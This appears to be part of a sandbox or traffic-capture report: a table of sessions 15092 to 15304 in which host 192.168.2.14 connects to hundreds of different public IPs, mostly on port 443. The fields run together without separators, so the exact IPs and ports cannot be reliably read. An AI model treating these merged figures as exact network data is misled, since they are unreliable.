                                                        15092192.168.2.1449194110.107.61.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15093192.168.2.1447280123.181.43.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15094192.168.2.144337847.4.148.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15095192.168.2.1432922100.52.167.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15096192.168.2.14540302.85.221.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15097192.168.2.1442868117.191.55.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15098192.168.2.1453508193.154.170.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15099192.168.2.145201071.210.221.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15100192.168.2.1438480191.249.156.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15101192.168.2.145640045.216.220.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15102192.168.2.1453156101.93.58.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15103192.168.2.14477428.130.92.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15104192.168.2.1456520182.172.201.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15105192.168.2.144508657.216.225.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15106192.168.2.144050863.88.178.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15107192.168.2.143830274.150.146.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15108192.168.2.1441856136.67.59.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15109192.168.2.1448114216.10.252.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15110192.168.2.143815257.99.147.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15111192.168.2.143978849.82.39.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15112192.168.2.1460700150.139.202.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15113192.168.2.144764812.48.186.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15114192.168.2.1438160106.8.84.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15115192.168.2.145103695.1.113.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15116192.168.2.1455120113.53.150.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15117192.168.2.1441496155.251.59.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15118192.168.2.143982041.154.74.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15119192.168.2.14543385.195.208.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15120192.168.2.1444390173.248.76.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15121192.168.2.143598488.142.149.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15122192.168.2.1436484104.117.77.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15123192.168.2.1448762154.82.207.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15124192.168.2.146083453.41.127.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15125192.168.2.145022042.34.86.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15126192.168.2.1459966157.64.1.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15127192.168.2.1452432201.213.207.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15128192.168.2.1435056149.149.217.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15129192.168.2.1441400188.51.240.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15130192.168.2.1441240155.14.174.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15131192.168.2.145141012.85.220.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15132192.168.2.145447849.107.183.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15133192.168.2.14348268.5.138.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15134192.168.2.1436542192.80.192.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15135192.168.2.1441132128.169.195.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15136192.168.2.1448034163.37.70.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15137192.168.2.143405434.255.11.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15138192.168.2.144543247.109.58.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15139192.168.2.144862438.152.184.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15140192.168.2.144543647.109.58.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15141192.168.2.1438108206.151.16.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15142192.168.2.145028460.216.234.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15143192.168.2.146054250.186.25.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15144192.168.2.143647252.109.214.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15145192.168.2.145539412.197.186.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15146192.168.2.1460006164.181.85.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15147192.168.2.14428669.24.26.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15148192.168.2.1457754121.149.133.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15149192.168.2.1457312116.128.56.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15150192.168.2.145250070.157.122.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15151192.168.2.1452576192.109.235.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15152192.168.2.1454406139.247.42.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15153192.168.2.144469851.58.176.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15154192.168.2.1445650121.90.79.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15155192.168.2.1456750174.144.88.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15156192.168.2.14593648.217.55.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15157192.168.2.144457454.97.82.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15158192.168.2.1442560183.82.154.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15159192.168.2.145023017.192.224.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15160192.168.2.1456256173.10.232.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15161192.168.2.1457452164.167.227.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15162192.168.2.145583472.126.75.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15163192.168.2.14445361.132.121.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15164192.168.2.1440612151.127.15.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15165192.168.2.144479875.114.25.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15166192.168.2.143454243.137.109.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15167192.168.2.1437104104.81.155.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15168192.168.2.1433870128.125.139.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15169192.168.2.145858819.238.32.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15170192.168.2.1446380176.71.223.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15171192.168.2.1433608212.125.207.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15172192.168.2.1451202178.144.93.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15173192.168.2.1449236209.78.70.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15174192.168.2.1440854158.176.215.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15175192.168.2.14459561.81.109.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15176192.168.2.1434112175.241.35.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15177192.168.2.1436548124.186.173.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15178192.168.2.1435520145.206.77.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15179192.168.2.1459222140.155.13.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15180192.168.2.145928866.121.207.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15181192.168.2.1459998110.96.80.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15182192.168.2.1448774128.44.177.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15183192.168.2.143338664.149.7.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15184192.168.2.1439562128.206.89.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15185192.168.2.1453936221.116.195.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15186192.168.2.1449490111.168.161.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15187192.168.2.1432778101.141.243.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15188192.168.2.1436106178.124.30.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15189192.168.2.1438448168.17.45.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15190192.168.2.144500274.28.246.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15191192.168.2.1433458170.83.197.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192192.168.2.145635496.210.94.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15193192.168.2.145540476.173.95.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15194192.168.2.1460002188.191.28.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15195192.168.2.146089850.146.161.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15196192.168.2.1445180218.226.65.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15197192.168.2.1451334114.25.149.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15198192.168.2.1458504212.23.2.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15199192.168.2.1440844213.92.37.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15200192.168.2.1448734111.163.92.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15201192.168.2.144285261.197.136.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15202192.168.2.144641674.208.77.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15203192.168.2.1445356185.119.151.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15204192.168.2.14400722.154.245.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15205192.168.2.1454592117.38.59.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15206192.168.2.144878269.30.218.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15207192.168.2.1452630166.116.65.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15208192.168.2.1451306222.100.64.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15209192.168.2.1439688124.16.236.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15210192.168.2.145638437.226.159.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15211192.168.2.145012424.20.236.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15212192.168.2.1453098178.159.100.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15213192.168.2.144145851.85.244.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15214192.168.2.1445478203.178.141.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15215192.168.2.144178470.74.48.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15216192.168.2.1460814183.231.230.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15217192.168.2.143843496.95.196.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15218192.168.2.1451684104.81.165.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15219192.168.2.1446790206.90.151.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15220192.168.2.143972053.47.148.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15221192.168.2.1447552219.249.141.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15222192.168.2.1437024204.161.23.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15223192.168.2.1434684148.225.177.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15224192.168.2.1448510187.40.28.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15225192.168.2.143673844.8.172.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15226192.168.2.1438650101.21.135.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15227192.168.2.143955699.8.151.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15228192.168.2.143670674.154.194.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15229192.168.2.1438436105.219.134.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15230192.168.2.1443426114.52.240.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15231192.168.2.1433316213.148.152.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15232192.168.2.1441480181.113.248.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15233192.168.2.1456920208.106.166.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15234192.168.2.1439290107.236.12.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15235192.168.2.1436700108.155.221.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15236192.168.2.1452460134.183.96.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15237192.168.2.145215663.150.251.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15238192.168.2.1434836112.11.51.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15239192.168.2.1445276165.157.232.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15240192.168.2.145413835.90.120.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15241192.168.2.1440538174.139.142.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15242192.168.2.1459924104.185.209.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15243192.168.2.1450758204.229.7.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15244192.168.2.1446684145.127.53.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15245192.168.2.1441956100.186.248.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15246192.168.2.1452282222.52.39.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15247192.168.2.1440496201.179.177.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15248192.168.2.143620261.73.198.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15249192.168.2.145767043.206.18.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15250192.168.2.1457814217.131.192.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15251192.168.2.1448558222.53.65.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15252192.168.2.144189853.68.254.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15253192.168.2.1457494152.70.25.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15254192.168.2.144915848.189.186.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15255192.168.2.1450220119.240.154.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15256192.168.2.1437948165.173.185.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15257192.168.2.1459612211.53.25.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15258192.168.2.1447848142.50.198.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15259192.168.2.1449286191.50.183.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15260192.168.2.1457246130.229.221.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15261192.168.2.1442410166.134.82.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15262192.168.2.143560423.88.43.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15263192.168.2.1447830142.140.102.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15264192.168.2.1448276172.130.6.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15265192.168.2.1433500154.77.137.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15266192.168.2.145484279.69.63.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15267192.168.2.145969087.52.184.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15268192.168.2.143474262.37.68.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15269192.168.2.1451420193.159.75.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15270192.168.2.1447900195.241.156.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15271192.168.2.14595129.74.227.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15272192.168.2.144645668.155.117.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15273192.168.2.144232823.235.164.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15274192.168.2.1436228203.65.249.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15275192.168.2.1444630126.194.56.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15276192.168.2.1446056154.220.175.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15277192.168.2.145393883.146.250.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15278192.168.2.143994091.6.147.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15279192.168.2.146038047.248.225.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15280192.168.2.145188232.161.170.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15281192.168.2.1440470208.146.233.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15282192.168.2.145167214.250.5.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15283192.168.2.145987658.53.212.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15284192.168.2.145791253.160.4.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15285192.168.2.145415291.116.0.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15286192.168.2.144202048.126.220.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15287192.168.2.144139243.70.96.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15288192.168.2.1444894210.177.116.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15289192.168.2.1451502210.247.68.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15290192.168.2.1447164112.236.237.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15291192.168.2.1438746198.172.39.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15292192.168.2.1442214104.247.78.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15293192.168.2.144059082.238.195.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15294192.168.2.1444834129.165.11.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15295192.168.2.1444234198.35.204.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15296192.168.2.1447904200.41.92.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15297192.168.2.1459372102.161.7.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15298192.168.2.1446588150.81.154.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15299192.168.2.1446494190.141.255.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15300192.168.2.14493401.167.214.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15301192.168.2.145875419.19.3.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15302192.168.2.145901831.166.214.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15303192.168.2.145357642.71.31.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15304192.168.2.1444990139.1.20.11443
